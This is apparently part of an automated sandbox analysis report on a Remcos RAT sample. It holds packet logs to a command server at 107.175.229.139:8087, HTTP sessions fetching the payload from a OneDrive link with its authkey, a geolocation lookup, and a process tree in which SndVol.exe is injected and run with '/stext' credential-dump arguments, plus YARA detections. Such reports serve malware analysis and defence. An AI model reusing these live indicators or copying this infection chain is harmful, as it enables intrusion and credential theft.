                                                              May 15, 2024 01:56:53.871037960 CEST808749708107.175.229.139192.168.2.5
                                                              May 15, 2024 01:56:53.871041059 CEST497088087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:56:53.871048927 CEST808749708107.175.229.139192.168.2.5
                                                              May 15, 2024 01:56:53.871061087 CEST808749708107.175.229.139192.168.2.5
                                                              May 15, 2024 01:56:53.871063948 CEST497088087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:56:53.871073008 CEST808749708107.175.229.139192.168.2.5
                                                              May 15, 2024 01:56:53.871084929 CEST808749708107.175.229.139192.168.2.5
                                                              May 15, 2024 01:56:53.871090889 CEST497088087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:56:53.871095896 CEST808749708107.175.229.139192.168.2.5
                                                              May 15, 2024 01:56:53.871112108 CEST497088087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:56:53.871119022 CEST808749708107.175.229.139192.168.2.5
                                                              May 15, 2024 01:56:53.871145010 CEST497088087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:56:53.871177912 CEST808749708107.175.229.139192.168.2.5
                                                              May 15, 2024 01:56:53.871191978 CEST808749708107.175.229.139192.168.2.5
                                                              May 15, 2024 01:56:53.871213913 CEST808749708107.175.229.139192.168.2.5
                                                              May 15, 2024 01:56:53.871218920 CEST497088087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:56:53.871227026 CEST808749708107.175.229.139192.168.2.5
                                                              May 15, 2024 01:56:53.871238947 CEST808749708107.175.229.139192.168.2.5
                                                              May 15, 2024 01:56:53.871251106 CEST808749708107.175.229.139192.168.2.5
                                                              May 15, 2024 01:56:53.871253014 CEST497088087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:56:53.871263027 CEST808749708107.175.229.139192.168.2.5
                                                              May 15, 2024 01:56:53.871275902 CEST808749708107.175.229.139192.168.2.5
                                                              May 15, 2024 01:56:53.871279955 CEST497088087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:56:53.871304989 CEST497088087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:56:53.917866945 CEST497088087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:56:54.365048885 CEST8049709178.237.33.50192.168.2.5
                                                              May 15, 2024 01:56:54.365120888 CEST4970980192.168.2.5178.237.33.50
                                                              May 15, 2024 01:56:56.673568010 CEST497088087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:56:56.847909927 CEST808749708107.175.229.139192.168.2.5
                                                              May 15, 2024 01:56:56.849766970 CEST497088087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:56:57.022191048 CEST808749708107.175.229.139192.168.2.5
                                                              May 15, 2024 01:56:57.030174017 CEST808749708107.175.229.139192.168.2.5
                                                              May 15, 2024 01:56:57.030349016 CEST497088087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:57:04.417090893 CEST49710443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:04.417149067 CEST4434971013.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:04.417222023 CEST49710443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:04.417649984 CEST49710443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:04.417695045 CEST4434971013.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:04.417762995 CEST49710443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:04.508040905 CEST49711443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:04.508076906 CEST4434971113.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:04.508160114 CEST49711443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:04.662187099 CEST49711443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:04.662224054 CEST4434971113.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:05.089240074 CEST4434971113.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:05.089420080 CEST49711443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:05.090812922 CEST49711443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:05.090826035 CEST4434971113.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:05.091044903 CEST4434971113.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:05.132792950 CEST49711443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:05.136435032 CEST49711443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:05.180119991 CEST4434971113.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:05.870840073 CEST4434971113.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:05.870943069 CEST4434971113.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:05.871001959 CEST49711443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:05.871196032 CEST49711443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:05.871210098 CEST4434971113.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:05.871225119 CEST49711443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:05.871229887 CEST4434971113.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:12.837265015 CEST49721443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:12.837301016 CEST4434972113.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:12.837399960 CEST49721443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:12.837491989 CEST49721443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:12.837536097 CEST4434972113.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:12.837582111 CEST49721443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:12.850301981 CEST49722443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:12.850333929 CEST4434972213.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:12.850397110 CEST49722443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:12.851713896 CEST49722443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:12.851728916 CEST4434972213.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:13.274394035 CEST4434972213.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:13.274501085 CEST49722443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:13.279659986 CEST49722443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:13.279671907 CEST4434972213.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:13.279930115 CEST4434972213.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:13.326697111 CEST49722443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:13.333154917 CEST49722443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:13.380112886 CEST4434972213.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:14.127547026 CEST4434972213.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:14.127648115 CEST4434972213.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:14.127767086 CEST49722443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:14.128005981 CEST49722443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:14.128029108 CEST4434972213.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:14.128037930 CEST49722443192.168.2.513.107.139.11
                                                              May 15, 2024 01:57:14.128043890 CEST4434972213.107.139.11192.168.2.5
                                                              May 15, 2024 01:57:18.262845039 CEST808749707107.175.229.139192.168.2.5
                                                              May 15, 2024 01:57:18.264314890 CEST497078087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:57:18.484375000 CEST808749707107.175.229.139192.168.2.5
                                                              May 15, 2024 01:57:48.582425117 CEST808749707107.175.229.139192.168.2.5
                                                              May 15, 2024 01:57:48.584034920 CEST497078087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:57:48.804744959 CEST808749707107.175.229.139192.168.2.5
                                                              May 15, 2024 01:58:18.882675886 CEST808749707107.175.229.139192.168.2.5
                                                              May 15, 2024 01:58:18.884038925 CEST497078087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:58:19.110558033 CEST808749707107.175.229.139192.168.2.5
                                                              May 15, 2024 01:58:42.661130905 CEST4970980192.168.2.5178.237.33.50
                                                              May 15, 2024 01:58:43.426512003 CEST4970980192.168.2.5178.237.33.50
                                                              May 15, 2024 01:58:44.629630089 CEST4970980192.168.2.5178.237.33.50
                                                              May 15, 2024 01:58:46.926611900 CEST4970980192.168.2.5178.237.33.50
                                                              May 15, 2024 01:58:49.147198915 CEST808749707107.175.229.139192.168.2.5
                                                              May 15, 2024 01:58:49.167994022 CEST497078087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:58:49.382194996 CEST808749707107.175.229.139192.168.2.5
                                                              May 15, 2024 01:58:51.614016056 CEST4970980192.168.2.5178.237.33.50
                                                              May 15, 2024 01:59:00.723380089 CEST4970980192.168.2.5178.237.33.50
                                                              May 15, 2024 01:59:18.926573038 CEST4970980192.168.2.5178.237.33.50
                                                              May 15, 2024 01:59:19.345727921 CEST808749707107.175.229.139192.168.2.5
                                                              May 15, 2024 01:59:19.347415924 CEST497078087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:59:19.574414968 CEST808749707107.175.229.139192.168.2.5
                                                              May 15, 2024 01:59:49.579780102 CEST808749707107.175.229.139192.168.2.5
                                                              May 15, 2024 01:59:49.584578991 CEST497078087192.168.2.5107.175.229.139
                                                              May 15, 2024 01:59:49.802031994 CEST808749707107.175.229.139192.168.2.5
                                                              May 15, 2024 02:00:19.778661966 CEST808749707107.175.229.139192.168.2.5
                                                              May 15, 2024 02:00:19.780630112 CEST497078087192.168.2.5107.175.229.139
                                                              May 15, 2024 02:00:20.000684977 CEST808749707107.175.229.139192.168.2.5
                                                              May 15, 2024 02:00:50.018156052 CEST808749707107.175.229.139192.168.2.5
                                                              May 15, 2024 02:00:50.023936033 CEST497078087192.168.2.5107.175.229.139
                                                              May 15, 2024 02:00:50.247400999 CEST808749707107.175.229.139192.168.2.5
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              May 15, 2024 01:56:47.477361917 CEST5113653192.168.2.51.1.1.1
                                                              May 15, 2024 01:56:49.340552092 CEST6157753192.168.2.51.1.1.1
                                                              May 15, 2024 01:56:52.686615944 CEST5774653192.168.2.51.1.1.1
                                                              May 15, 2024 01:56:52.797141075 CEST53577461.1.1.1192.168.2.5
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              May 15, 2024 01:56:47.477361917 CEST192.168.2.51.1.1.10x1808Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                              May 15, 2024 01:56:49.340552092 CEST192.168.2.51.1.1.10x630aStandard query (0)2hhi9w.am.files.1drv.comA (IP address)IN (0x0001)false
                                                              May 15, 2024 01:56:52.686615944 CEST192.168.2.51.1.1.10x2717Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              May 15, 2024 01:56:47.588795900 CEST1.1.1.1192.168.2.50x1808No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                              May 15, 2024 01:56:47.588795900 CEST1.1.1.1192.168.2.50x1808No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                              May 15, 2024 01:56:47.588795900 CEST1.1.1.1192.168.2.50x1808No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                              May 15, 2024 01:56:47.588795900 CEST1.1.1.1192.168.2.50x1808No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                              May 15, 2024 01:56:47.588795900 CEST1.1.1.1192.168.2.50x1808No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                              May 15, 2024 01:56:49.633586884 CEST1.1.1.1192.168.2.50x630aNo error (0)2hhi9w.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                              May 15, 2024 01:56:49.633586884 CEST1.1.1.1192.168.2.50x630aNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                              May 15, 2024 01:56:52.797141075 CEST1.1.1.1192.168.2.50x2717No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                              • onedrive.live.com
                                                              • geoplugin.net
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.549709178.237.33.50806352C:\Windows\SysWOW64\SndVol.exe
                                                              TimestampBytes transferredDirectionData
                                                              May 15, 2024 01:56:53.131319046 CEST71OUTGET /json.gp HTTP/1.1
                                                              Host: geoplugin.net
                                                              Cache-Control: no-cache
                                                              May 15, 2024 01:56:53.365603924 CEST1166INHTTP/1.1 200 OK
                                                              date: Tue, 14 May 2024 23:56:53 GMT
                                                              server: Apache
                                                              content-length: 958
                                                              content-type: application/json; charset=utf-8
                                                              cache-control: public, max-age=300
                                                              access-control-allow-origin: *
                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 34 2e 31 37 2e 34 30 2e 31 30 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 69 61 6d 69 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 [TRUNCATED]
                                                              Data Ascii: { "geoplugin_request":"84.17.40.102", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Miami", "geoplugin_region":"Florida", "geoplugin_regionCode":"FL", "geoplugin_regionName":"Florida", "geoplugin_areaCode":"", "geoplugin_dmaCode":"528", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"25.7689", "geoplugin_longitude":"-80.1946", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.54970513.107.139.114435900C:\Users\user\Desktop\HGTQP09643009.scr.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-05-14 23:56:48 UTC213OUTGET /download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Accept: */*
                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                              Host: onedrive.live.com
                                                              2024-05-14 23:56:49 UTC1176INHTTP/1.1 302 Found
                                                              Cache-Control: no-cache, no-store
                                                              Pragma: no-cache
                                                              Content-Type: text/html
                                                              Expires: -1
                                                              Location: https://2hhi9w.am.files.1drv.com/y4mBwd_O0orCZYCB-m72OLd7ovLPprUM4laUDtpNM9mFpZXV0m08RNxiySgMwrezLWpJ9opJdXpBLPD4g8kCB8JiMk9OxEtTRR2kIVZbBpjfX2AjWqKohwSAcs4spP31bO_6wbHclxYjBI65SmJucHX6rze-IHNZqYsk8p04Qkw_zadYlV3wkmmKUArpPV4h0pOWbS2cHZ3eQ_Rv_q7DGlwfA/255_Jsqwmpulpcm?download&psid=1
                                                              Set-Cookie: E=P:YNi5hHF03Ig=:gzB9cs0VwkTmh8V7nNb00uLpUB/oCwGI2O1TkIbyo0g=:F; domain=.live.com; path=/
                                                              Set-Cookie: xid=3de28d96-2537-4739-91c0-461ea09af5c2&&ODSP-ODWEB-ODCF&174; domain=.live.com; path=/
                                                              Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                              Set-Cookie: LD=; domain=.live.com; expires=Tue, 14-May-2024 22:16:48 GMT; path=/
                                                              Set-Cookie: wla42=; domain=live.com; expires=Tue, 21-May-2024 23:56:49 GMT; path=/
                                                              X-Content-Type-Options: nosniff
                                                              Strict-Transport-Security: max-age=31536000
                                                              X-MSNServer: fdffbf76f-f9b28
                                                              X-ODWebServer: nameastus2946819-odwebpl
                                                              X-Cache: CONFIG_NOCACHE
                                                              X-MSEdge-Ref: Ref A: 7D42D3F340974FFAB3706632FEC9A5F8 Ref B: BN3EDGE0506 Ref C: 2024-05-14T23:56:48Z
                                                              Date: Tue, 14 May 2024 23:56:48 GMT
                                                              Connection: close
                                                              Content-Length: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.54971113.107.139.114432172C:\Users\Public\Libraries\Jsqwmpul.PIF
                                                              TimestampBytes transferredDirectionData
                                                              2024-05-14 23:57:05 UTC213OUTGET /download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Accept: */*
                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                              Host: onedrive.live.com
                                                              2024-05-14 23:57:05 UTC1177INHTTP/1.1 302 Found
                                                              Cache-Control: no-cache, no-store
                                                              Pragma: no-cache
                                                              Content-Type: text/html
                                                              Expires: -1
                                                              Location: https://2hhi9w.am.files.1drv.com/y4mPer_JvrxbylmNPC7e_eDC5k1q6183BqTBthJtctBOaRiGjAhjc2kQZzIhZZ1Vh_YjRYQyAtF4xHLCFvvVPSAsxjyL8i1wQvRabl8_pNjxWSb1Jv8_7p1Ai3I3ZtD6RGOa5xk6OFjuhoVC4DS4KP2yeInjRv7r1TxmTbZOs5x72KxUmmK5LteubP8q7-iXV-V_CqR4qJRnN0LL0mK241C_Q/255_Jsqwmpulpcm?download&psid=1
                                                              Set-Cookie: E=P:2xSXjnF03Ig=:qxxFerB2KxQwWqhseJBvbAVjVNq05h+bX9OFZ0dvmQM=:F; domain=.live.com; path=/
                                                              Set-Cookie: xid=a809cc06-9a40-4d74-ad7b-7a2b8fd9cba2&&ODSP-ODWEB-ODCF&174; domain=.live.com; path=/
                                                              Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                              Set-Cookie: LD=; domain=.live.com; expires=Tue, 14-May-2024 22:17:05 GMT; path=/
                                                              Set-Cookie: wla42=; domain=live.com; expires=Tue, 21-May-2024 23:57:05 GMT; path=/
                                                              X-Content-Type-Options: nosniff
                                                              Strict-Transport-Security: max-age=31536000
                                                              X-MSNServer: 7dfffcfdb8-w4zvz
                                                              X-ODWebServer: nameastus2708987-odwebpl
                                                              X-Cache: CONFIG_NOCACHE
                                                              X-MSEdge-Ref: Ref A: 397ACDDA25CE42F6A82E14A5873D98BD Ref B: BN3EDGE0506 Ref C: 2024-05-14T23:57:05Z
                                                              Date: Tue, 14 May 2024 23:57:05 GMT
                                                              Connection: close
                                                              Content-Length: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.54972213.107.139.114436804C:\Users\Public\Libraries\Jsqwmpul.PIF
                                                              TimestampBytes transferredDirectionData
                                                              2024-05-14 23:57:13 UTC213OUTGET /download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Accept: */*
                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                              Host: onedrive.live.com
                                                              2024-05-14 23:57:14 UTC1176INHTTP/1.1 302 Found
                                                              Cache-Control: no-cache, no-store
                                                              Pragma: no-cache
                                                              Content-Type: text/html
                                                              Expires: -1
                                                              Location: https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3BKuKW5XqcUBzuNsRzBm8cRH2dyNR7edm5BhYh2ZPGwCX7_jbh1_b4HWcaJyIPa8XSxZScIlzsPvq8mXbEqv3_NRqmzc5SEYRFJoSRIDrGT_5zChqpa1DfS9BSPUTA_Mn38QqZA4arKsZn5LrHXWfVkxbboXKRBvJdhsN61kO3Jctwqp904djxjoFo5q0yNZkw/255_Jsqwmpulpcm?download&psid=1
                                                              Set-Cookie: E=P:fCp6k3F03Ig=:Usm+GFdYWJ5cMKTzwPf7OvJIdpmSTU++lLDGROmLMwY=:F; domain=.live.com; path=/
                                                              Set-Cookie: xid=9a7c4c1d-3211-4d02-b6ec-e4494a22b769&&ODSP-ODWEB-ODCF&174; domain=.live.com; path=/
                                                              Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                              Set-Cookie: LD=; domain=.live.com; expires=Tue, 14-May-2024 22:17:13 GMT; path=/
                                                              Set-Cookie: wla42=; domain=live.com; expires=Tue, 21-May-2024 23:57:14 GMT; path=/
                                                              X-Content-Type-Options: nosniff
                                                              Strict-Transport-Security: max-age=31536000
                                                              X-MSNServer: fdffbf76f-5b7nw
                                                              X-ODWebServer: nameastus2946819-odwebpl
                                                              X-Cache: CONFIG_NOCACHE
                                                              X-MSEdge-Ref: Ref A: 8094703DD6D14E9BB941C4B1BCB6DBFF Ref B: BN3EDGE0811 Ref C: 2024-05-14T23:57:13Z
                                                              Date: Tue, 14 May 2024 23:57:13 GMT
                                                              Connection: close
                                                              Content-Length: 0


                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:01:56:46
                                                              Start date:15/05/2024
                                                              Path:C:\Users\user\Desktop\HGTQP09643009.scr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\HGTQP09643009.scr.exe"
                                                              Imagebase:0x400000
                                                              File size:1'103'360 bytes
                                                              MD5 hash:C8B0899DD51C7516316ED413771E71C4
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:Borland Delphi
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:01:56:50
                                                              Start date:15/05/2024
                                                              Path:C:\Windows\SysWOW64\extrac32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\HGTQP09643009.scr.exe C:\\Users\\Public\\Libraries\\Jsqwmpul.PIF
                                                              Imagebase:0x2f0000
                                                              File size:29'184 bytes
                                                              MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:01:56:50
                                                              Start date:15/05/2024
                                                              Path:C:\Windows\SysWOW64\SndVol.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\System32\SndVol.exe
                                                              Imagebase:0xaa0000
                                                              File size:226'712 bytes
                                                              MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4419622044.000000001E42F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:moderate
                                                              Has exited:false

                                                              Target ID:4
                                                              Start time:01:56:53
                                                              Start date:15/05/2024
                                                              Path:C:\Windows\SysWOW64\SndVol.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\xkjscr"
                                                              Imagebase:0xaa0000
                                                              File size:226'712 bytes
                                                              MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:01:56:53
                                                              Start date:15/05/2024
                                                              Path:C:\Windows\SysWOW64\SndVol.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"
                                                              Imagebase:0xaa0000
                                                              File size:226'712 bytes
                                                              MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:6
                                                              Start time:01:56:53
                                                              Start date:15/05/2024
                                                              Path:C:\Windows\SysWOW64\SndVol.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"
                                                              Imagebase:0xaa0000
                                                              File size:226'712 bytes
                                                              MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:7
                                                              Start time:01:56:53
                                                              Start date:15/05/2024
                                                              Path:C:\Windows\SysWOW64\SndVol.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"
                                                              Imagebase:0xaa0000
                                                              File size:226'712 bytes
                                                              MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:8
                                                              Start time:01:56:53
                                                              Start date:15/05/2024
                                                              Path:C:\Windows\SysWOW64\SndVol.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\jhbdectkjqlx"
                                                              Imagebase:0xaa0000
                                                              File size:226'712 bytes
